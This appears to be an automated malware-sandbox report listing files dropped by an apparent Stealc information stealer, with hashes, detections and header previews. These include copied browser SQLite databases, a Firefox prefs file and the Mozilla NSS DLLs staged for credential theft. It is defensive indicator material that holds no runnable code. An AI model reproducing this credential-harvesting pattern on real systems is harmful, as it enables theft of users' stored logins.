                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\CBAKJEHD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\CBGHCAKKFBGDHJJJKECF

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\GDAAKKEHDHCAAAKFCBAKKEHIEC

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\GDBFBFCBFBKECAAKJKFB

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\GHDBKFHIJKJKECAAAECA

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\IDHIEBAAKJDHIECAAFHC

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9571
                                                                                                                                                                                                                                                  Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                  C:\ProgramData\IJJJKEGHJKFHJKFHDHCF

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\KJEHJKJE

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                                                                                                  Entropy (8bit):6.377344133144299
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:Wj5x+suTCQ/hiOU3dw9KdFBNC83W9jIVKKK3P6giPkBVOKM2ZHdZvl7dmmZ:MKTCQ/hiFSyC83WOkP6giKOKZZrp8K
                                                                                                                                                                                                                                                  MD5:F451E235D8BEB0D3E9D76099FAFFE38B
                                                                                                                                                                                                                                                  SHA1:30A69DAC80B3C9CC804B7F43DD36F9636CEABC17
                                                                                                                                                                                                                                                  SHA-256:A9DE4662043AE815647230088973C5BF19C155A808FB881D74D405222FFD73F5
                                                                                                                                                                                                                                                  SHA-512:9FA0A6D3E7DB8E5AD679D972AAEAABB2C63C50C25AF4655974C04D23BF461E52BA6F5BD1282324E8A12EDEB2199F14C0684426CFA3DBFDCBB584BF9FACD21160
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: random(4).exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: EdYEXasNiR.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 5EfYBe3nch.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 8WFJ38EJo5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: w22319us3M.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 5uVReRlvME.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: DRWgoZo325.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: i8Vwc7iOaG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: glpEv3POe7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gold1111111111[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):824832
                                                                                                                                                                                                                                                  Entropy (8bit):7.823924318464353
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:wu4dP5M4Q2Mm+liZAjESlBkVcd8NhhG5MXNYliZAjESlBkVcd8NhhG5MXNT:l4dPpQPmord8NhhG5Mdard8NhhG5MdT
                                                                                                                                                                                                                                                  MD5:4F3C6C19B0078AFB9AC1E6D2CE6116E7
                                                                                                                                                                                                                                                  SHA1:1C033C45A569E76C5CBD737E2BBAE4804834A6B4
                                                                                                                                                                                                                                                  SHA-256:DC1C0E08CA598A43DFB1E6DDD4E87824A39FECCAB05A97A1FC6BD3D4C308817A
                                                                                                                                                                                                                                                  SHA-512:1DA756B733CE646D3784EC8A1A3D490209C0E7BA1282C5C8DF9AAEC3A2C73DD109D7BA423379B982D251AD5AA31EB08B98A6C98F7CE841A482D001C9638F0CD8
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....rg.................H........................@.......................................@.....................................(....@.......................P......................................@n.............. ...L............................text....G.......H.................. ..`.rdata.......`.......P..............@..@.data...."..........................@....tls.........0......................@....rsrc........@......................@..@.reloc.......P......................@..B.BSS.........p.......&..............@....BSS.........0......................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                  Entropy (8bit):5.374032798533596
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoQBTEQsfNaoQ1aQYfNaoQ/hQfYfNaoQDSXt0UrU0U8Qg:6NnQBTEQYNnQEQkNnQ/hQsNnQDSXt0UD
                                                                                                                                                                                                                                                  MD5:ECD1CA679824CFDCFCD114FC48DACC3E
                                                                                                                                                                                                                                                  SHA1:8D76843B99E986D57C3CA8228E8FE41E0EA5AD0C
                                                                                                                                                                                                                                                  SHA-256:4F0812912B2B8FBEC7477745D57B4669BE5E388C353C62692BEC144E93B7B543
